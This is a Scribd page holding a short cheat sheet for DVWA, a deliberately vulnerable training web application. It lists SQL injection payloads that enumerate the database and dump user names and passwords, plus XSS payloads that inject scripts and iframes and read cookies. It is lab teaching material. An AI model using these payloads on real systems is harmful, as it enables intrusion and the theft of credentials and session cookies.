0% found this document useful (0 votes)
83 views4 pages

Dvwa Sqlinjection

This document provides examples of SQL injection and cross-site scripting (XSS) attacks that can be performed on a vulnerable web application called DVWA. It lists SQL queries that can be used to retrieve database information like versions and tables, as well as XSS payloads that trigger alerts and read cookies. The goal is to demonstrate how these attacks work through examples on a training platform called DVWA.

Uploaded by

Hieun kong
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
83 views4 pages

Dvwa Sqlinjection

This document provides examples of SQL injection and cross-site scripting (XSS) attacks that can be performed on a vulnerable web application called DVWA. It lists SQL queries that can be used to retrieve database information like versions and tables, as well as XSS payloads that trigger alerts and read cookies. The goal is to demonstrate how these attacks work through examples on a training platform called DVWA.

Uploaded by

Hieun kong
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PPTX, PDF, TXT or read online on Scribd
You are on page 1/ 4

DVWA

DVWA - SqlInjection
Always True Scenario,
• %' or '0'='0
– SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
Display Database Version,
• %' or 0=0 union select null, version() #
Display Database User,
• %' or 0=0 union select null, user() #
Display Database Name,
• %' or 0=0 union select null, database() #
Display all tables in information_schema,
• %' and 1=0 union select null, table_name from
information_schema.tables #
DVWA - SqlInjection
Display all the user tables in information_schema,
• %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
Display all the columns fields in the information_schema user table,
• %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
Display all the columns field contents in the
information_schema user table,
• %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password)
from users #
DVWA - XSS
XSS Stored Menu,
• <script>alert("This is a XSS Exploit Test")</script>
• <iframe src="http://www.cnn.com"></iframe>
• <script>alert(document.cookie)</script>
XSS Reflected,
Submit cookie XSS attack - CSRF,
• <script>alert(document.cookie)</script> - use curl
to manipulate URL

You might also like